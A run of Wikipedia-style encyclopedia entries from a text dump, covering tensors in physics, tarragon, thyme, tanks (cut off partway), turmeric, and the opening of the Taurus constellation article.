Other examples from physics Common applications include: Electromagnetic tensor (or Faraday tensor) in electromagnetism Finite deformation tensors for describing deformations and strain tensor for strain in continuum mechanics Permittivity and electric susceptibility are tensors in anisotropic media Four-tensors in general relativity (e.g. stress–energy tensor), used to represent momentum fluxes Spherical tensor operators are the eigenfunctions of the quantum angular momentum operator in spherical coordinates Diffusion tensors, the basis of diffusion tensor imaging, represent rates of diffusion in biological environments Quantum mechanics and quantum computing utilize tensor products for combination of quantum states Computer vision and optics The concept of a tensor of order two is often conflated with that of a matrix. Tensors of higher order do however capture ideas important in science and engineering, as has been shown successively in numerous areas as they develop. This happens, for instance, in the field of computer vision, with the trifocal tensor generalizing the fundamental matrix. The field of nonlinear optics studies the changes to material polarization density under extreme electric fields. The polarization waves generated are related to the generating electric fields through the nonlinear susceptibility tensor. If the polarization P is not linearly proportional to the electric field E, the medium is termed nonlinear. To a good approximation (for sufficiently weak fields, assuming no permanent dipole moments are present), P is given by a Taylor series in E whose coefficients are the nonlinear susceptibilities: P_i/ε_0 = χ^(1)_{ij} E_j + χ^(2)_{ijk} E_j E_k + χ^(3)_{ijkl} E_j E_k E_l + ... Here χ^(1) is the linear susceptibility, χ^(2) gives the Pockels effect and second harmonic generation, and χ^(3) gives the Kerr effect. This expansion shows the way higher-order tensors arise naturally in the subject matter. Machine learning The properties of tensors, especially tensor decomposition, have enabled their use in machine learning to embed higher dimensional data in artificial neural networks. This notion of tensor differs significantly from that in other areas of mathematics and physics, in the sense that a tensor is usually regarded as a numerical quantity in a fixed basis, and the dimension of the spaces along the different axes of the tensor need not be the same. Generalizations Tensor products of vector spaces The vector spaces of a tensor product need not be the same, and sometimes the elements of such a more general tensor product are called "tensors". For example, an element of the tensor product space V ⊗ W is a second-order "tensor" in this more general sense, and an order-d tensor may likewise be defined as an element of a tensor product of d different vector spaces. A type (n, m) tensor, in the sense defined previously, is also a tensor of order n + m in this more general sense. The concept of tensor product can be extended to arbitrary modules over a ring. Tensors in infinite dimensions The notion of a tensor can be generalized in a variety of ways to infinite dimensions. One, for instance, is via the tensor product of Hilbert spaces. Another way of generalizing the idea of tensor, common in nonlinear analysis, is via the multilinear maps definition where instead of using finite-dimensional vector spaces and their algebraic duals, one uses infinite-dimensional Banach spaces and their continuous dual. Tensors thus live naturally on Banach manifolds and Fréchet manifolds. 
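In the scalar (one-component) limit, the susceptibility expansion given above under Computer vision and optics is just a polynomial in the field. A minimal sketch (our own; the coefficient magnitudes are invented purely for illustration, not measured values):

# Scalar toy version of P = eps0 * (chi1*E + chi2*E**2 + chi3*E**3).
EPS0 = 8.854e-12                 # vacuum permittivity, F/m
CHI1, CHI2, CHI3 = 1.0, 1e-12, 1e-23   # invented illustrative coefficients

def polarization(E):
    return EPS0 * (CHI1 * E + CHI2 * E**2 + CHI3 * E**3)

for E in (1e3, 1e8, 1e11):       # weak to extreme fields, V/m
    nonlinear = polarization(E) - EPS0 * CHI1 * E
    print(f"E={E:.0e} V/m: P={polarization(E):.3e}, nonlinear part={nonlinear:.3e}")

With these numbers the nonlinear part is negligible at weak fields and becomes comparable to the linear response only at extreme field strengths, which is the regime nonlinear optics studies.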
Tensor densities Suppose that a homogeneous medium fills R^3, so that the density of the medium is described by a single scalar value ρ in kg⋅m^−3. The mass, in kg, of a region Ω is obtained by multiplying ρ by the volume of the region Ω, or equivalently integrating the constant ρ over the region: m = ∫_Ω ρ dx dy dz, where the Cartesian coordinates x, y, z are measured in m. If the units of length are changed into cm, then the numerical values of the coordinate functions must be rescaled by a factor of 100: x' = 100x, y' = 100y, z' = 100z. The numerical value of the density ρ must then also transform by 100^−3 to compensate, so that the numerical value of the mass in kg is still given by the integral of ρ' dx' dy' dz'. Thus ρ' = 100^−3 ρ (in units of kg⋅cm^−3). More generally, if the Cartesian coordinates x, y, z undergo a linear transformation, then the numerical value of the density ρ must change by a factor of the reciprocal of the absolute value of the determinant of the coordinate transformation, so that the integral remains invariant, by the change of variables formula for integration. Such a quantity that scales by the reciprocal of the absolute value of the determinant of the coordinate transition map is called a scalar density. To model a non-constant density, ρ is a function of the variables x, y, z (a scalar field), and under a curvilinear change of coordinates, it transforms by the reciprocal of the Jacobian of the coordinate change. For more on the intrinsic meaning, see Density on a manifold. A tensor density transforms like a tensor under a coordinate change, except that it in addition picks up a factor of the absolute value of the determinant of the coordinate transition: the components transform by the ordinary tensor law multiplied by |det R|^−w. Here w is called the weight. In general, any tensor multiplied by a power of this function or its absolute value is called a tensor density, or a weighted tensor. An example of a tensor density is the current density of electromagnetism. Under an affine transformation of the coordinates, a tensor transforms by the linear part of the transformation itself (or its inverse) on each index. These come from the rational representations of the general linear group. But this is not quite the most general linear transformation law that such an object may have: tensor densities are non-rational, but are still semisimple representations. A further class of transformations come from the logarithmic representation of the general linear group, a reducible but not semisimple representation, consisting of a pair (x, y) with the transformation law (x, y) → (x + y log |det R|, y). Geometric objects The transformation law for a tensor behaves as a functor on the category of admissible coordinate systems, under general linear transformations (or, other transformations within some class, such as local diffeomorphisms). This makes a tensor a special case of a geometrical object, in the technical sense that it is a function of the coordinate system transforming functorially under coordinate changes. Examples of objects obeying more general kinds of transformation laws are jets and, more generally still, natural bundles. Spinors When changing from one orthonormal basis (called a frame) to another by a rotation, the components of a tensor transform by that same rotation. This transformation does not depend on the path taken through the space of frames. However, the space of frames is not simply connected (see orientation entanglement and plate trick): there are continuous paths in the space of frames with the same beginning and ending configurations that are not deformable one into the other. 
Spinors
When changing from one orthonormal basis (called a frame) to another by a rotation, the components of a tensor transform by that same rotation. This transformation does not depend on the path taken through the space of frames. However, the space of frames is not simply connected (see orientation entanglement and plate trick): there are continuous paths in the space of frames with the same beginning and ending configurations that are not deformable one into the other. It is possible to attach an additional discrete invariant to each frame that incorporates this path dependence, and which turns out (locally) to have values of ±1. A spinor is an object that transforms like a tensor under rotations in the frame, apart from a possible sign that is determined by the value of this discrete invariant. Spinors are elements of the spin representation of the rotation group, while tensors are elements of its tensor representations. Other classical groups have tensor representations, and so also tensors that are compatible with the group, but all non-compact classical groups have infinite-dimensional unitary representations as well.
Mathematics
Geometry
null
29967
https://en.wikipedia.org/wiki/Tarragon
Tarragon
Tarragon (Artemisia dracunculus), also known as estragon, is a species of perennial herb in the family Asteraceae. It is widespread in the wild across much of Eurasia and North America and is cultivated for culinary and medicinal purposes. One subspecies, Artemisia dracunculus var. sativa, is cultivated for the use of its leaves as an aromatic culinary herb. In some other subspecies, the characteristic aroma is largely absent. Informal names for distinguishing the variations include "French tarragon" (best for culinary use) and "Russian tarragon". Tarragon grows to tall, with slender branches. The leaves are lanceolate, long and broad, glossy green, with an entire margin. The flowers are produced in small capitula diameter, each capitulum containing up to 40 yellow or greenish-yellow florets. French tarragon, however, seldom produces any flowers (or seeds). Some tarragon plants produce seeds that are generally sterile; others produce viable seeds. Tarragon has rhizomatous roots that it uses to spread and readily reproduce.
Cultivation
French tarragon is the variety used for cooking in the kitchen and is not grown from seed, as the flowers are sterile; instead, it is propagated by root division. Russian tarragon (A. dracunculoides L.) can be grown from seed but is much weaker in flavor when compared to the French variety. However, Russian tarragon is a far more hardy and vigorous plant, spreading at the roots and growing over a meter tall. This tarragon actually prefers poor soils and happily tolerates drought and neglect. It is not as intensely aromatic and flavorsome as its French cousin, but it produces many more leaves from early spring onwards that are mild and good in salads and cooked food. Russian tarragon loses what flavor it has as it ages and is widely considered useless as a culinary herb, though it is sometimes used in crafts. The young stems in early spring can be cooked as an asparagus substitute. Horticulturists recommend that Russian tarragon be grown indoors from seed and planted out in summer. The spreading plants can be divided easily. A better substitute for Russian tarragon is Mexican tarragon (Tagetes lucida), also known as Mexican mint marigold, Texas tarragon, or winter tarragon. It is much more reminiscent of French tarragon, with a hint of anise. Although not in the same genus as the other tarragons, Mexican tarragon has a more robust flavor than Russian tarragon that does not diminish significantly with age. It cannot, however, be grown as a perennial in cold climates.
Health
Tarragon has a flavor and odor profile reminiscent of anise, due largely to the presence of estragole, a known carcinogen and teratogen in mice. The estragole concentration in fresh tarragon leaves is about 2900 mg/kg. However, a European Union investigation concluded that the danger of estragole is minimal. Research studying rat livers found the BMDL10 (approximately the dose that would cause a 10% increase in background tumor rate) of estragole to be 3.3–6.5 mg/kg body weight per day, which for an 80 kg human would be ~400 mg per day, or 130 g of fresh tarragon leaves per day. When used as a culinary herb, a typical quantity in a dish could be 5 g of fresh leaves. Estragole, along with the other oils that give tarragon its flavor, is highly volatile and vaporizes as the leaf is dried, reducing both the health risk and the usability of the herb. Several other herbs, such as basil, also contain estragole.
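The dose figures above can be reproduced with simple arithmetic. The short sketch below uses only the values quoted in the text; taking the midpoint of the BMDL10 range is an illustrative choice, not a toxicological recommendation:

```python
# Values quoted in the text above
bmdl10_low, bmdl10_high = 3.3, 6.5     # mg estragole / kg body weight / day
body_weight_kg = 80.0
estragole_mg_per_kg_leaves = 2900.0    # fresh tarragon leaves

# Midpoint of the BMDL10 range scaled to body weight
daily_dose_mg = (bmdl10_low + bmdl10_high) / 2 * body_weight_kg
# Mass of fresh leaves containing that dose, in grams
leaves_g = daily_dose_mg / estragole_mg_per_kg_leaves * 1000

print(round(daily_dose_mg), round(leaves_g))   # 392 135
```

Within rounding, this matches the "~400 mg per day, or 130 g of fresh tarragon leaves" figures quoted above.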
Uses
Culinary use
In Syria, fresh tarragon is eaten with white Syrian cheese, and also used with dishes such as shish barak and kibbeh labaniyeh. In Iran, tarragon is used as a side dish in sabzi khordan (fresh herbs), or in stews and Persian-style pickles, particularly khiar shoor (pickled cucumbers). Tarragon is one of the four fines herbes of French cooking and is particularly suitable for chicken, fish, and egg dishes. Tarragon is the main flavoring component of Béarnaise sauce. Fresh, lightly bruised tarragon sprigs are steeped in vinegar to produce tarragon vinegar. Pounded with butter, it produces an excellent topping for grilled salmon or beef. Tarragon is used to flavor a popular carbonated soft drink in Armenia, Azerbaijan, Georgia (where it originally comes from), and, by extension, Russia, Ukraine and Kazakhstan. The drink, named Tarkhun, is made out of sugar, carbonated water, and tarragon leaves, which give it its signature green color. Tarragon is one of the main ingredients in Chakapuli, a Georgian national dish. In Slovenia, tarragon is used in a variation of the traditional nut roll sweet cake, called potica. In Hungary, a popular chicken soup is flavored with tarragon.
Chemistry
Gas chromatography/mass spectrometry analysis has revealed that A. dracunculus oil contains predominantly phenylpropanoids such as estragole (16.2%), methyl eugenol (35.8%), and trans-anethole (21.1%). The other major constituents were terpenes and terpenoids, including α-trans-ocimene (20.6%), limonene (12.4%), α-pinene (5.1%), allo-ocimene (4.8%), methyl eugenol (2.2%), β-pinene (0.8%), α-terpinolene (0.5%), bornyl acetate (0.5%) and bicyclogermacrene (0.5%). The organic compound capillin was initially isolated from Artemisia capillaris in 1956. cis-Pellitorin, an isobutyramide eliciting a pungent taste, has been isolated from the tarragon plant.
Name
The plant is commonly known as in Swedish and Dutch. The use of for the herb or plant in German is outdated. The species name, dracunculus, means "little dragon", and the plant seems to be so named due to its coiled roots. See Artemisia for the derivation of the genus name.
Biology and health sciences
Herbs and spices
Plants
29968
https://en.wikipedia.org/wiki/Thyme
Thyme
Thyme is a culinary herb consisting of the dried aerial parts of some members of the genus Thymus of flowering plants in the mint family Lamiaceae. Thymes are native to Eurasia and North Africa. Thymes have culinary, medicinal, and ornamental uses. The species most commonly cultivated and used for culinary purposes is Thymus vulgaris, native to Southeast Europe.
History
Wild thyme grows in the Levant, where it might have been first cultivated. Ancient Egyptians used common thyme (Thymus vulgaris) for embalming. The ancient Greeks used it in their baths and burnt it as incense in their temples, believing it was a source of courage. The spread of thyme throughout Europe was thought to be due to the Romans, as they used it to purify their rooms and to "give an aromatic flavour to cheese and liqueurs". In the European Middle Ages, the herb was placed beneath pillows to aid sleep and ward off nightmares. In this period, women also often gave knights and warriors gifts that included thyme leaves, as it was believed to bring courage to the bearer. Thyme was also used as incense and placed on coffins during funerals, as it was supposed to assure passage into the next life. The name of the genus of fish Thymallus, first given to the grayling (T. thymallus, described in the 1758 edition of Systema Naturae by Swedish zoologist Carl Linnaeus), originates from the faint smell of thyme that emanates from the flesh.
Cultivation
Thyme is best cultivated in a hot, sunny location with well-drained soil. It is generally planted in the spring, and thereafter grows as a perennial. It can be propagated by seed, cuttings, or dividing rooted sections of the plant. It tolerates drought well. It can be pruned after flowering to keep it from getting woody.
Culinary use
In some Levantine countries, the condiment za'atar (Arabic for both thyme and marjoram) contains many of the essential oils found in thyme. Thyme is a common component of the bouquet garni, and of herbes de Provence. Thyme is sold both fresh and dried. While summer-seasonal, fresh greenhouse thyme is often available year-round. The fresh form is more flavourful but also less convenient; storage life is rarely more than a week. However, the fresh form can last many months if carefully frozen, and thyme retains its flavour on drying better than many other herbs. Fresh thyme is commonly sold in bunches of sprigs. A sprig is a single stem snipped from the plant. It is composed of a woody stem with paired leaf or flower clusters ("leaves") spaced apart. A recipe may measure thyme by the bunch (or fraction thereof), or by the sprig, or by the tablespoon or teaspoon. Dried thyme is widely used in Armenia in tisanes. Depending on how it is used in a dish, the whole sprig may be used, or the leaves removed and the stems discarded. Usually, when a recipe mentions a bunch or sprig, it means the whole form; when it mentions spoons, it means the leaves. It is perfectly acceptable to substitute dried for whole thyme. Leaves may be removed from stems either by scraping with the back of a knife, or by pulling through the fingers or tines of a fork. In Moroccan tradition, dried figs are flavored with mint: after being softened in a couscous pot, the figs are rested with additional mint leaves and sprinkled with thyme before being stored in sealed containers, both to enhance the flavor and to aid preservation.
Chemical and antimicrobial properties
The chemical composition of Thymus (thyme) includes a variety of essential oils, flavonoids, phenolic acids, triterpenes, and other compounds. The essential oils found in thyme include thymol, which is a major component responsible for the plant's antiseptic properties, and carvacrol, another primary component with similar functions. Other essential oils present are p-cymene, γ-terpinene, linalool, and 1,8-cineole. Gas chromatographic analysis reveals that the most abundant volatile component of thyme leaves is thymol, at 8.55 mg/g. Other components are carvacrol, linalool, α-terpineol, and 1,8-cineole. Some of these compounds have beneficial properties. In particular, thymol has been historically used as an antibiotic and antiseptic, especially in traditional medicine. Oil of thyme, the essential oil of common thyme, contains 20–54% thymol. Thymol is an active ingredient in various commercially produced mouthwashes, such as Listerine. Flavonoids in thyme include luteolin-7-O-glucoside, a glycoside known for its antioxidant and anti-inflammatory properties, as well as apigenin, quercetin, and kaempferol. Phenolic acids such as rosmarinic acid, which is known for its antioxidant, anti-inflammatory, and antimicrobial activities, along with caffeic acid and chlorogenic acid, are also present in thyme. Triterpenes, such as oleanolic acid and ursolic acid, are part of thyme's composition, contributing to its overall health benefits. Additionally, thyme contains tannins, which contribute to its astringent properties, as well as saponins and other minor compounds.
Important species and cultivars
Thymus citriodorus – various lemon thymes, orange thymes, lime thyme
Thymus herba-barona (caraway thyme) is used both as a culinary herb and a ground cover, and has a very strong caraway scent due to the chemical carvone.
Thymus praecox (mother of thyme, wild thyme) is cultivated as an ornamental, but in Iceland it is also gathered as a wild herb for cooking and drunk as a warm infusion.
Thymus pseudolanuginosus (woolly thyme) is not a culinary herb, but is grown as a ground cover.
Thymus serpyllum (wild thyme, creeping thyme) is an important nectar source plant for honeybees. All thyme species are nectar sources, but wild thyme covers large areas of droughty, rocky soils in southern Europe (both Greece and Malta are especially famous for wild thyme honey) and North Africa, as well as in similar landscapes in the Berkshire and Catskill Mountains of the northeastern US. The lowest-growing of the widely used thymes, it is good for walkways. It is also an important caterpillar food plant for the large blue and common blue butterflies.
Thymus vulgaris (common thyme, English thyme, summer thyme, winter thyme, French thyme, or garden thyme) is a commonly used culinary herb. It also has medicinal uses. Common thyme is a Mediterranean perennial which is best suited to well-drained soils and full sun.
Biology and health sciences
Lamiales
null
29970
https://en.wikipedia.org/wiki/Tank
Tank
A tank is an armoured fighting vehicle intended as a primary offensive weapon in front-line ground combat. Tank designs are a balance of heavy firepower, strong armour, and battlefield mobility provided by tracks and a powerful engine; their main armament is often mounted within a turret. They are a mainstay of modern 20th and 21st century ground forces and a key part of combined arms combat.
Modern tanks are versatile mobile land weapons platforms whose main armament is a large-calibre tank gun mounted in a rotating gun turret, supplemented by machine guns or other ranged weapons such as anti-tank guided missiles or rocket launchers. They have heavy vehicle armour which provides protection for the crew, the vehicle's munition storage, fuel tank and propulsion systems. The use of tracks rather than wheels provides improved operational mobility which allows the tank to overcome rugged terrain and adverse conditions such as mud and ice or snow better than wheeled vehicles, and thus to be more flexibly positioned at advantageous locations on the battlefield. These features enable the tank to perform in a variety of intense combat situations, simultaneously both offensively (with direct fire from its powerful main gun) and defensively (as fire support and defilade for friendly troops, owing to its near invulnerability to common infantry small arms and good resistance against heavier weapons), all while maintaining the mobility needed to exploit changing tactical situations. Anti-tank weapons used in 2022, some of them man-portable, have nonetheless demonstrated the ability to destroy older generations of tanks with single shots. Fully integrating tanks into modern military forces spawned a new era of combat, armoured warfare.
Until the invention of the main battle tank, tanks were typically categorized either by weight class (light, medium, heavy or superheavy tanks) or doctrinal purpose (breakthrough-, cavalry-, infantry-, cruiser-, or reconnaissance tanks). Some are larger and more thickly armoured, with large guns, while others are smaller, lightly armoured, and equipped with a smaller-calibre, lighter gun. These smaller tanks move over terrain with speed and agility and can perform a reconnaissance role in addition to engaging hostile targets. The smaller, faster tank would not normally engage in battle with a larger, heavily armoured tank, except during a surprise flanking manoeuvre.
Etymology
The word tank was first applied in a military context to British "landships" in 1915 to keep their nature secret before they entered service.
Origins
On 24 December 1915, a meeting took place of the Inter-Departmental Conference (including representatives of the Director of Naval Construction's Committee, the Admiralty, the Ministry of Munitions, and the War Office). Its purpose was to discuss the progress of the plans for what were described as "Caterpillar Machine Gun Destroyers or Land Cruisers". In his autobiography, Albert Gerald Stern (Secretary to the Landship Committee, later head of the Mechanical Warfare Supply Department) says that at that meeting the name was settled; he incorrectly added, "and the name has now been adopted by all countries in the world." Lieutenant-Colonel Ernest Swinton, who was secretary to the meeting, says that he was instructed to find a non-committal word when writing his report of the proceedings. In the evening he discussed it with a fellow officer, Lt-Col Walter Dally Jones, and they chose the word "tank".
"That night, in the draft report of the conference, the word 'tank' was employed in its new sense for the first time." Swinton's
Technology
Military technology: General
null
29973
https://en.wikipedia.org/wiki/Turmeric
Turmeric
Turmeric, or Curcuma longa, is a flowering plant in the ginger family Zingiberaceae. It is a perennial, rhizomatous, herbaceous plant native to the Indian subcontinent and Southeast Asia that requires temperatures between and high annual rainfall to thrive. Plants are gathered each year for their rhizomes, some for propagation in the following season and some for consumption. The rhizomes are used fresh or boiled in water and dried, after which they are ground into a deep orange-yellow powder commonly used as a coloring and flavoring agent in many Asian cuisines, especially for curries, as well as for the dyeing characteristics imparted by the principal turmeric constituent, curcumin. Turmeric powder has a warm, bitter, black pepper-like flavor and an earthy, mustard-like aroma. Curcumin, a bright yellow chemical produced by the turmeric plant, is approved as a food additive by the World Health Organization, European Parliament, and United States Food and Drug Administration. Although long used in Ayurvedic medicine, there is no high-quality clinical evidence that consuming turmeric or curcumin is effective for treating any disease.
Origin and distribution
The greatest diversity of Curcuma species by number alone is in India, at around 40 to 45 species. Thailand has a comparable 30 to 40 species. Other countries in tropical Asia also have numerous wild species of Curcuma. Recent studies have also shown that the taxonomy of C. longa is problematic, with only the specimens from South India being identifiable as C. longa. The phylogeny, relationships, intraspecific and interspecific variation, and even identity of other species and cultivars in other parts of the world still need to be established and validated. Various species currently utilized and sold as "turmeric" in other parts of Asia have been shown to belong to several physically similar taxa, with overlapping local names.
History
Turmeric has been used in Asia for centuries and is a major part of Ayurveda, Siddha medicine, traditional Chinese medicine, Unani, and the animistic rituals of Austronesian peoples. It was first used as a dye, and then later for its supposed properties in folk medicine. In India, it spread with Hinduism and Buddhism, as the yellow dye is used to color the robes of monks and priests. In Island Southeast Asia, there is linguistic and circumstantial evidence of the ancient use of turmeric among the Austronesian peoples soon after dispersal from Taiwan (starting ), before contact with India. In Indonesia and the Philippines, turmeric was used for food, dyeing textiles, medicine, as well as body painting. It was commonly an important ingredient in various animistic rituals. Kikusawa and Reid (2007) have concluded that *kunij, the oldest reconstructed Proto-Malayo-Polynesian form for "turmeric" in the Austronesian languages, is primarily associated with the importance of its use as a dye. Other members of the genus Curcuma native to Southeast Asia (like Curcuma zedoaria) were also used for food and spice, but not as dyes. Turmeric (along with Curcuma zedoaria) was also spread with the Lapita people of the Austronesian expansion into Oceania. Turmeric can only be propagated with rhizomes; thus its pre-contact distribution into the Pacific Islands can only have been via human introduction. The populations in Micronesia, Island Melanesia, and Polynesia (including as far as Hawaii and Easter Island) used turmeric widely for both food and dye before European contact.
In Micronesia, it was an important trade item in the sawei maritime exchange between Yap and the outer atolls of the Carolines, where it could not grow. In some smaller islands, the dye was extracted from the leaves, since the rhizomes remained too small in sandy soils. It was also carried by the Austronesian migrations to Madagascar. Turmeric was found in Farmana, dating to between 2600 and 2200 BCE, and in a merchant's tomb in Megiddo, Israel, dating from the second millennium BCE. It was noted as a dye plant in Assyrian cuneiform medical texts from Ashurbanipal's library at Nineveh, from the 7th century BCE. In Medieval Europe, turmeric was called "Indian saffron."
Etymology
The name possibly derives from Middle English or Early Modern English as or . It may be of Latin origin, ("meritorious earth"). The Latin specific epithet longa means long.
Description
Turmeric is a perennial herbaceous plant that reaches up to tall. It has highly branched, yellow to orange, cylindrical, aromatic rhizomes. The leaves are alternate and arranged in two rows. They are divided into leaf sheath, petiole, and leaf blade. From the leaf sheaths, a false stem is formed. The petiole is long. The simple leaf blades are usually long and rarely up to . They have a width of and are oblong to elliptical, narrowing at the tip.
Inflorescence, flower, and fruit
At the top of the inflorescence, stem bracts are present on which no flowers occur; these are white to green and sometimes tinged reddish-purple, and the upper ends are tapered. The hermaphrodite flowers are zygomorphic and threefold. The three sepals are long, fused, and white, and have fluffy hairs; the three calyx teeth are unequal. The three bright-yellow petals are fused into a corolla tube up to long. The three corolla lobes have a length of and are triangular with soft-spiny upper ends. The median corolla lobe is larger than the two lateral ones, and only the median stamen of the inner circle is fertile. The anther is spurred at its base. All other stamens are converted to staminodes. The outer staminodes are shorter than the labellum. The labellum is yellowish, with a yellow ribbon in its center, and it is obovate, with a length from . The three carpels are fused into an inferior, trilobed ovary, which is sparsely hairy. The fruit capsule opens with three compartments. In East Asia, the flowering time is usually in August. Terminally on the false stem is an inflorescence stem, long, containing many flowers. The bracts are light green and ovate to oblong with a blunt upper end, with a length of .
Phytochemistry
Turmeric powder is about 60–70% carbohydrates, 6–13% water, 6–8% protein, 5–10% fat, 3–7% dietary minerals, 3–7% essential oils, 2–7% dietary fiber, and 1–6% curcuminoids. The golden yellow color of turmeric is due to curcumin. Phytochemical components of turmeric include diarylheptanoids, a class including numerous curcuminoids, such as curcumin, demethoxycurcumin, and bisdemethoxycurcumin. Curcumin constitutes up to 3.14% of assayed commercial samples of turmeric powder (the average was 1.51%); curry powder contains much less (an average of 0.29%). Some 34 essential oils are present in turmeric, among which turmerone, germacrone, atlantone, and zingiberene are major constituents.
Uses
Culinary
Turmeric is one of the key ingredients in many Asian dishes, imparting a mustard-like, earthy aroma and pungent, slightly bitter flavor to foods. It is used mostly in savory dishes, but also is used in some sweet dishes, such as the cake sfouf.
In India, turmeric leaf is used to prepare special sweet dishes, patoleo, by layering rice flour and a coconut-jaggery mixture on the leaf, then closing and steaming it in a special utensil (chondrõ). Most turmeric is used in the form of rhizome powder to impart a golden yellow color. It is used in many products such as canned beverages, baked products, dairy products, ice cream, yogurt, yellow cakes, orange juice, biscuits, popcorn, cereals and sauces. It is a principal ingredient in curry powders. Although typically used in its dried, powdered form, turmeric also is used fresh, like ginger. Turmeric is used widely as a spice in South Asian and Middle Eastern cooking. Various Iranian khoresh recipes begin with onions caramelized in oil and turmeric. The Moroccan spice mix ras el hanout typically includes turmeric. In South Africa, turmeric is used to give boiled white rice a golden color, known as geelrys (yellow rice), traditionally served with bobotie. In Vietnamese cuisine, turmeric powder is used to color and enhance the flavors of certain dishes, such as bánh xèo, bánh khọt, and mì Quảng. The staple Cambodian curry paste, kroeung, used in many dishes, including fish amok, typically contains fresh turmeric. In Indonesia, turmeric leaves are used for the Minang or Padang curry base of Sumatra, such as rendang, sate padang, and many other varieties. In the Philippines, turmeric is used in the preparation and cooking of kuning, satti, and some variants of adobo. In Thailand, fresh turmeric rhizomes are used widely in many dishes, in particular in southern Thai cuisine, such as yellow curry and turmeric soup. Turmeric is used in a hot drink called "turmeric latte" or "golden milk" that is made with milk, frequently coconut milk. The turmeric milk drink known as haldī dūdh (haldī means "turmeric" in Hindi) is a traditional Indian recipe. Sold in the US and UK, the drink known as "golden milk" uses nondairy milk and sweetener, and sometimes black pepper after the traditional recipe (which may also use ghee). Turmeric is approved for use as a food color, assigned the code E100. The oleoresin is used for oil-containing products. In combination with annatto (E160b), turmeric has been used to color numerous food products. Turmeric is used to give a yellow color to some prepared mustards, canned chicken broths, and other foods, often as a much cheaper replacement for saffron.
Traditional uses
In 2019, the European Medicines Agency concluded that turmeric herbal teas, or other forms taken by mouth, could, on the basis of their long-standing traditional use, be used to relieve mild digestive problems, such as feelings of fullness and flatulence. Turmeric grows wild in the forests of South and Southeast Asia, where it is collected for use in classical Indian medicine (Siddha or Ayurveda). In Eastern India, the plant is used as one of the nine components of along with young plantain or banana plant, taro leaves, barley (), wood apple (), pomegranate (), Saraca indica, (Arum), or , and rice paddy. The Haldi ceremony, called in Bengal (literally "yellow on the body"), is observed during wedding celebrations of people of Indian culture throughout the Indian subcontinent. In Tamil Nadu and Andhra Pradesh, as a part of the Tamil–Telugu marriage ritual, dried turmeric tuber tied with string is used to create a Thali necklace.
In western and coastal India, during weddings of the Marathi and Konkani people and of Kannada Brahmins, turmeric tubers are tied with strings by the couple to their wrists during a ceremony, Kankana Bandhana. In many Hindu communities, turmeric paste is applied to the bride and groom as part of pre-wedding festivities known as the haldi ceremony. Turmeric makes a poor fabric dye, as it is not lightfast, but it is commonly used in Indian clothing, such as saris and Buddhist monks' robes. During the late Edo period (1603–1867), turmeric was used to dilute or substitute more expensive safflower dyestuff in the production of . Friedrich Ratzel reported in The History of Mankind in 1896 that in Micronesia, turmeric powder was applied for embellishment of the body, clothing, utensils, and for ceremonial uses. Native Hawaiians, who introduced it to Hawaii, make a bright yellow dye out of it.
Indicator
Turmeric paper, also called curcuma paper or, in German literature, Curcumapapier, is paper steeped in a tincture of turmeric and allowed to dry. It is used in chemical analysis as an indicator for acidity and alkalinity. The paper is yellow in acidic and neutral solutions and turns brown to reddish-brown in alkaline solutions, with the transition occurring between pH 7.4 and 9.2.
Adulteration
As turmeric and other spices are commonly sold by weight, the potential exists for powders of toxic, cheaper agents with a similar color to be added, such as lead(II,IV) oxide ("red lead"). These additives give turmeric an orange-red color instead of its native gold-yellow, and such conditions led the US Food and Drug Administration (FDA) to issue import alerts from 2013 to 2019 on turmeric originating in India and Bangladesh. Imported into the United States in 2014 were approximately of turmeric, some of which was used for food coloring, traditional medicine, or dietary supplements. Lead detection in turmeric products led to recalls across the United States, Canada, Japan, Korea, and the United Kingdom through 2016. Lead chromate, a bright yellow chemical compound, was found as an adulterant of turmeric in Bangladesh, where turmeric is used commonly in foods and the contamination levels were up to 500 times higher than the national limit. Researchers identified a chain of sources adulterating the turmeric with lead chromate: from farmers to merchants selling low-grade turmeric roots to "polishers" who added lead chromate for yellow color enhancement, to wholesalers for market distribution, all unaware of the potential consequences of lead toxicity. Another common adulterant in turmeric, metanil yellow (also known as acid yellow 36), is considered by the British Food Standards Agency an illegal dye for use in foods.
Medical research
Turmeric and curcumin have been studied in numerous clinical trials for various human diseases and conditions, with no high-quality evidence of any anti-disease effect or health benefit. There is no scientific evidence that curcumin reduces inflammation. There is weak evidence that turmeric extracts may be beneficial for relieving symptoms of knee osteoarthritis, as well as for reducing pain and muscle damage following physical exercise. There is good evidence that turmeric is an allergen.
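The turmeric-paper indicator behaviour described above maps naturally onto a small conditional. The sketch below is illustrative only: the function name and the treatment of the transition range are assumptions, while the pH values come from the text:

```python
def turmeric_paper_color(ph: float) -> str:
    """Approximate color of turmeric paper at a given pH (illustrative)."""
    if ph < 7.4:
        return "yellow"                            # acidic and neutral solutions
    if ph <= 9.2:
        return "transitional (yellow to reddish-brown)"
    return "brown to reddish-brown"                # alkaline solutions

for ph in (4.0, 7.0, 8.3, 10.5):
    print(ph, turmeric_paper_color(ph))
```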
Biology and health sciences
Herbs and spices
Plants
29984
https://en.wikipedia.org/wiki/Taurus%20%28constellation%29
Taurus (constellation)
Taurus (Latin, 'Bull') is one of the constellations of the zodiac and is located in the northern celestial hemisphere. Taurus is a large and prominent constellation in the Northern Hemisphere's winter sky. It is one of the oldest constellations, dating back to the Early Bronze Age at least, when it marked the location of the Sun during the spring equinox. Its importance to the agricultural calendar influenced various bull figures in the mythologies of Ancient Sumer, Akkad, Assyria, Babylon, Egypt, Greece, and Rome. Its old astronomical symbol is ♉︎, which resembles a bull's head. A number of features exist that are of interest to astronomers. Taurus hosts two of the nearest open clusters to Earth, the Pleiades and the Hyades, both of which are visible to the naked eye. At first magnitude, the red giant Aldebaran is the brightest star in the constellation. In the northeast part of Taurus is Messier 1, more commonly known as the Crab Nebula, a supernova remnant containing a pulsar. One of the closest regions of active star formation, the Taurus-Auriga complex, crosses into the northern part of the constellation. The variable star T Tauri is the prototype of a class of pre-main-sequence stars.
Characteristics
